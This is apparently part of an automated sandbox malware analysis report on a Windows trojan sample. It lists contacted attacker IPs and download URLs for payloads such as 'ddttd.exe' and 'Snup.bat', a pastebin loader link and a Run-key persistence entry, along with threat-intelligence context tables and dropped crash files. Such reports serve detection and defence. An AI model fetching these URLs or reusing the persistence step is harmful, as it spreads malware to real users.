                          		unknown
                          https://pastebin.com/raw/fR7B5m9EPsvrreve.exe, 00000002.00000002.2289800804.0000026DC0EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.86.105.109svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E76000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, svrreve.exe.0.drfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.com/raw/fR7B5m9EXubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.86.105.109(fsvrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.86.105.109/ups/ddttd.exeubes6SC7Vd.exe, svrreve.exe.0.drfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.17.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbcubes6SC7Vd.exe, svrreve.exe.0.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.86.105.109/hook/upgrade.php2svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E3A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/clap-rs/clap/issuessvrreve.exe.0.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.86.105.109/ups/Snup.batubes6SC7Vd.exe, svrreve.exe.0.drfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pastebin.comsvrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.comsvrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.ipwhois.io/flags/us.svgsvrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FEB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F65000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E71000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0EE3000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC1018000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://docs.rs/getrandom#nodejs-es-module-supportCallingsvrreve.exe.0.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ipwhois.appubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880103000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E46000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          172.86.105.109
                          		unknownUnited States
                          		53667PONYNETUSfalse
                          172.67.19.24
                          		pastebin.comUnited States
                          		13335CLOUDFLARENETUStrue
                          195.201.57.90
                          		ipwhois.appGermany
                          		24940HETZNER-ASDEfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1462351
                          Start date and time:2024-06-25 14:54:42 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 38s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:ubes6SC7Vd.exe
                          renamed because original name is a hash value
                          Original Sample Name:f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@16/18@2/3
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 57
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.182.143.212
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target svrreve.exe, PID 7924 because it is empty
                          • Execution Graph export aborted for target svrreve.exe, PID 8076 because it is empty
                          • Execution Graph export aborted for target ubes6SC7Vd.exe, PID 7268 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          08:55:42API Interceptor78x Sleep call for process: ubes6SC7Vd.exe modified
                          08:55:56API Interceptor162x Sleep call for process: svrreve.exe modified
                          08:56:33API Interceptor3x Sleep call for process: WerFault.exe modified
                          13:56:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xohtsts "C:\ProgramData\uovan\svrreve.exe"
                          13:56:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xohtsts "C:\ProgramData\uovan\svrreve.exe"

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.67.19.24Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          195.201.57.90cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                          • /?output=json
                          Clipper.exeGet hashmaliciousUnknownBrowse
                          • /?output=json
                          cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                          • /?output=json
                          Cryptor.exeGet hashmaliciousLuca StealerBrowse
                          • /?output=json
                          Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                          • /?output=json
                          rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                          • /?output=json
                          Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                          • /?output=json
                          rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                          • /?output=json
                          3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                          • ipwhois.app/xml/
                          KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                          • ipwhois.app/xml/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          pastebin.comd43YUxXAW7.exeGet hashmaliciousDCRatBrowse
                          • 104.20.4.235
                          IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                          • 104.20.4.235
                          V8ZnJcPOUY.rtfGet hashmaliciousHTMLPhisherBrowse
                          • 104.20.4.235
                          A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                          • 104.20.4.235
                          LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                          • 104.20.4.235
                          invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                          • 172.67.19.24
                          Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC, XmrigBrowse
                          • 104.20.3.235
                          0xkcWr1hvs.exeGet hashmaliciousDCRatBrowse
                          • 104.20.4.235
                          AbvmEnagz3.exeGet hashmaliciousDCRatBrowse
                          • 104.20.3.235
                          xworm.exeGet hashmaliciousXWormBrowse
                          • 172.67.19.24
                          ipwhois.appSecuriteInfo.com.FileRepMalware.9397.20651.exeGet hashmaliciousUnknownBrowse
                          • 15.204.213.5
                          CbLQcrwzUi.exeGet hashmaliciousUnknownBrowse
                          • 15.204.213.5
                          AYReport_EN.exeGet hashmaliciousBlackGuardBrowse
                          • 15.204.213.5
                          Fortnite_CHEAT_CRACKED.exeGet hashmaliciousUnknownBrowse
                          • 108.181.47.111
                          3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          JFBYfxYeTO.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          PONYNETUSxgYRAaym6l.exeGet hashmaliciousUnknownBrowse
                          • 104.194.134.68
                          Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                          • 198.251.88.167
                          https://messengeravl-my.sharepoint.com/:b:/p/joe/ESmpVXV4LaVIg3kfinawWKsBp8BjLcpEjCZgutNWEl7T3g?e=dXSYQsGet hashmaliciousHTMLPhisherBrowse
                          • 104.194.149.21
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                          • 198.251.88.167
                          temp_2312.pdf.exeGet hashmaliciousDanaBotBrowse
                          • 104.194.143.5
                          temp_2312.pdf.exeGet hashmaliciousDanaBotBrowse
                          • 104.194.143.5
                          HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
                          • 168.119.115.138
                          MT103-7543324334hsbc.com.exeGet hashmaliciousRemcosBrowse
                          • 138.201.150.244
                          BEfVzgLE2x.dllGet hashmaliciousRedLineBrowse
                          • 78.47.64.127
                          FACTURA08798696.vbeGet hashmaliciousGuLoader, RemcosBrowse
                          • 138.201.150.244
                          A7eSEifPRD.exeGet hashmaliciousUnknownBrowse
                          • 49.12.121.47
                          A7eSEifPRD.exeGet hashmaliciousUnknownBrowse
                          • 49.12.121.47
                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                          • 78.47.2.70
                          https://web.gvpdemo.com/auth/realms/vault/login-actions/action-token?key=eyJhbGciOiJIUzUxMiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJiNTlmOTRhNS1lNTIyLTQ4ZTYtYTVlNy0wZDUzNjMxYTNhY2QifQ.eyJleHAiOjE3MTkyNTI2NDYsImlhdCI6MTcxODk5MzQ0NiwianRpIjoiOGM2MDc5MzctN2IxNi00MmQ4LTk0ZGQtYmE3ZDQ5YjQxNDQxIiwiaXNzIjoiaHR0cHM6Ly93ZWIuZ3ZwZGVtby5jb20vYXV0aC9yZWFsbXMvdmF1bHQiLCJhdWQiOiJodHRwczovL3dlYi5ndnBkZW1vLmNvbS9hdXRoL3JlYWxtcy92YXVsdCIsInN1YiI6ImFmNzVhOGZjLWZkZTctNDY0ZC1hYzUxLTU1MzAzYWQ3NzZjMSIsInR5cCI6ImV4ZWN1dGUtYWN0aW9ucyIsImF6cCI6IndlYi1ndnAiLCJub25jZSI6IjhjNjA3OTM3LTdiMTYtNDJkOC05NGRkLWJhN2Q0OWI0MTQ0MSIsInJxYWMiOlsiVkVSSUZZX0VNQUlMIiwiVVBEQVRFX1BBU1NXT1JEIl0sInJlZHVyaSI6Imh0dHBzOi8vZ3ZwZGVtby5jb20ifQ.X3XXXUWQADuhXGHJhhCPXtpRSyB0lUwg6O8SGQ7zySPbWflQddcAjYFrnXlNtaQuXOoHGSqnIE7LmQ1CAC4uxgGet hashmaliciousUnknownBrowse
                          • 188.40.28.5
                          T4LJO0xbse.exeGet hashmaliciousQuasarBrowse
                          • 195.201.57.90
                          pli6MTVsRr.elfGet hashmaliciousMiraiBrowse
                          • 5.75.234.233
                          CLOUDFLARENETUSSecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                          • 104.21.95.147
                          https://service.ringcentral.com@reflexlogisticsllc.com/access/auth/3uacfw56k2anhclxj/ZnJhbi5yZWlzQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          Techno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 172.67.148.197
                          https://9vn.lagerpec.com/N3pd9/Get hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          https://c4acj123.caspio.com/dp/dabfd000f7918b16918d49aa94aaGet hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          http://andreolacentralhotel.info/4498942116Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          WBK project specifications WB174482021.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          https://www.winhelponline.com/blog/microsoft-edge-url-shortcut/Get hashmaliciousHTMLPhisherBrowse
                          • 104.22.4.69
                          QscottEFT Payment Remittance #11782.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 172.64.151.101
                          https://silk-proximal-fortnight.glitch.me#a2V2aW4ucm9sbGVyQHNhaWMuY29tGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          https://service.ringcentral.com@reflexlogisticsllc.com/access/auth/3uacfw56k2anhclxj/ZnJhbi5yZWlzQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          https://silk-proximal-fortnight.glitch.me#a2V2aW4ucm9sbGVyQHNhaWMuY29tGet hashmaliciousHTMLPhisherBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          ManualsViewer-v3.3.1222.0_49700000.msiGet hashmaliciousUnknownBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          https://drive.google.com/file/d/1CrwYox8X3b4CkAOtlNJvWfIGwcPeyZn4/view?usp=sharing_eip_m&ts=667a04a5Get hashmaliciousUnknownBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          gdC5AKTv6RiIgyr.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          0044FIDB240149.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          Payroll List or Salary List.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          https://antiphishing.vadesecure.com/v4?f=Q3ZQNmU2SnpsRFlRbUF3dnXrUX6IVRqoHkav3zS2FUU4SSgWF2Bh53LuIqIaYuHrQDsnYOK56JKj0hXr4VDw6qL5o_uh_nqnyJa_2on34iQ&i=SXVFem5DOGVpUU1rNjdmQs96J83fcHVCxOlJVucRT2c&k=syJL&r=bWt1djZ5QzcyUms5R1Nzas8e2Z1uyQF5dl89S8qefCBSiTlgrr5sTiH-8ESNqzpA&s=28bc277065cef76943ee4a3e64550f59f4824833fcb12a460650a34e741aba3d&u=http%3A%2F%2Ffranceuniv.frGet hashmaliciousUnknownBrowse
                          • 172.67.19.24
                          • 195.201.57.90
                          crypted file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 172.67.19.24
                          • 195.201.57.90

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svrreve.exe_4286e8fbb8d129acde2c2cdc87e289eb4d67a11_3a68e51a_b34c5d47-7d17-4f5b-963d-944657b9dcdb\Report.wer

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.967153438027498
                          Encrypted:false
                          SSDEEP:192:4VTerVy7l0W5Q76aKTDdx+zuiF4Z24lO8WQ:mT2yqWe76aMZYzuiF4Y4lO8WQ
                          MD5:C6ED4C0A108214319EDDB061337AE9A7
                          SHA1:170EFEE0DD6721E28088515B3DFC8160B5D482CA
                          SHA-256:2F04301F7291630E8E63B6BD84AC1889244AF57698072734B9785291CED9B475
                          SHA-512:55D02A36ED3A44AAAF9D50AC62A38CA8FBFA2689CEF41A559BDFE430BB00431172F0C8088551A2624DCE46DC361B40358B175FBED2FD86A2D755F59B14EBBA13
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.1.5.6.3.1.4.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.2.0.7.8.7.8.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.4.c.5.d.4.7.-.7.d.1.7.-.4.f.5.b.-.9.6.3.d.-.9.4.4.6.5.7.b.9.d.c.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.b.2.0.e.8.9.-.b.3.d.a.-.4.5.8.7.-.b.d.a.8.-.e.7.b.0.e.a.2.9.3.6.f.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.r.r.e.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.i.d.g.i.n.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.c.-.0.0.0.1.-.0.0.1.4.-.c.f.e.a.-.b.6.1.3.f.f.c.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.2.b.f.2.0.c.c.d.c.a.5.a.2.4.a.8.0.a.5.9.b.3.e.c.6.f.8.b.a.1.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.5.0.f.7.4.0.3.f.2.5.a.d.d.2.9.a.4.6.4.4.9.1.d.3.7.f.5.6.b.5.3.8.1.d.4.a.7.3.!.s.v.r.r.e.v.e...e.x.e.....T.a.r.g.e.t.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svrreve.exe_4286e8fbb8d129acde2c2cdc87e289eb4d67a11_3a68e51a_d83fe5a2-8191-464a-8e63-e00eb386a5cc\Report.wer

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.9671639421296586
                          Encrypted:false
                          SSDEEP:192:NQiQrVF7l0W5Q76aKTDdx+zuiF4Z24lO8WQ:misFqWe76aMZYzuiF4Y4lO8WQ
                          MD5:383D7A6EAF851901D3A6909B1E3B8E26
                          SHA1:DB15DA9AEE7711DC584CD3594676D723544E6B1A
                          SHA-256:F29E3A3D595E22CBBC8675AA92FBEB3988FDEFE1F9C51E49A078CD75D28A6A76
                          SHA-512:C421455A619C51B88EDF88BA0CE7D537F3B00E6D960C2B15BC8BCF992357C6CD39BF923A41F0F206D8B3C2937346DBFE00AD6F5365C194CF238AF7504E119B76
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.7.9.3.7.7.6.9.9.1.0.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.1.6.3.1.6.1.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.3.f.e.5.a.2.-.8.1.9.1.-.4.6.4.a.-.8.e.6.3.-.e.0.0.e.b.3.8.6.a.5.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.4.a.b.4.9.1.-.f.2.0.7.-.4.f.f.f.-.a.e.f.c.-.f.0.9.1.8.6.0.6.c.b.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.r.r.e.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.i.d.g.i.n.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.4.-.0.0.0.1.-.0.0.1.4.-.7.7.2.d.-.e.a.0.e.f.f.c.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.2.b.f.2.0.c.c.d.c.a.5.a.2.4.a.8.0.a.5.9.b.3.e.c.6.f.8.b.a.1.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.5.0.f.7.4.0.3.f.2.5.a.d.d.2.9.a.4.6.4.4.9.1.d.3.7.f.5.6.b.5.3.8.1.d.4.a.7.3.!.s.v.r.r.e.v.e...e.x.e.....T.a.r.g.e.t.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svrreve.exe_dd346975e3306521ab968e66e8e02b708a4e949a_3a68e51a_379f0937-93d4-4de0-940c-fa0288de695b\Report.wer

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.3034050183915444
                          Encrypted:false
                          SSDEEP:192:VFdaIrV7t90yonekaWxJzGjlucGzuiF4Z24lO8WQ:X0E7Uyon5am98rGzuiF4Y4lO8WQ
                          MD5:C104DCEE50B43043A1E8268C0854C2FA
                          SHA1:FF855C5927B74B7B2BF7E90042FE07F5F8FE6D53
                          SHA-256:2A92CB533CE8F63D488A6FAAD93D4B1F3594BD03EA22173153E473E20B84AAA3
                          SHA-512:FC1953FD2CB1B3853603B5C355A91B3A8DB54FD3BD01BAE74E3E00874857136C87ADAD3E15685BCF4A1E3F809F5DB8AE30247B8114AC2A184B18713870E61FB7
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.6.3.5.1.4.3.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.7.0.7.0.1.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.9.f.0.9.3.7.-.9.3.d.4.-.4.d.e.0.-.9.4.0.c.-.f.a.0.2.8.8.d.e.6.9.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.b.d.3.9.f.6.-.6.7.4.4.-.4.4.1.3.-.a.8.1.9.-.9.6.6.5.b.1.0.9.e.f.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.r.r.e.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.i.d.g.i.n.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.0.-.0.0.0.1.-.0.0.1.4.-.2.4.c.d.-.1.9.0.2.f.f.c.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.2.b.f.2.0.c.c.d.c.a.5.a.2.4.a.8.0.a.5.9.b.3.e.c.6.f.8.b.a.1.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.5.0.f.7.4.0.3.f.2.5.a.d.d.2.9.a.4.6.4.4.9.1.d.3.7.f.5.6.b.5.3.8.1.d.4.a.7.3.!.s.v.r.r.e.v.e...e.x.e.....T.a.r.g.e.t.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1737.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8548
                          Entropy (8bit):3.691423304861039
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJqE1rc6Y9QdvgmfZp8rhIpDu89bkf6fSMm:R6lXJxy6YqdvgmfHLkif4
                          MD5:45679926B97B3A85ECA82F3ACD58084A
                          SHA1:93DF90DE704C08B75D0F068BEC2DDA06D36A0B00
                          SHA-256:BE402A5803DD2E50F8BD0E766C9BBE3B01C85AEEA54C3953C080A12FB2FFEC5B
                          SHA-512:499466EB933DCB22A40E92BFE2DE562D575B64AF147AB9F10374F247095940A3A390F0294B73DD7D676902C433212B4BB64F9CA5EA0AA8455339FB489B6731EC
                          Malicious:false
                          Reputation:low
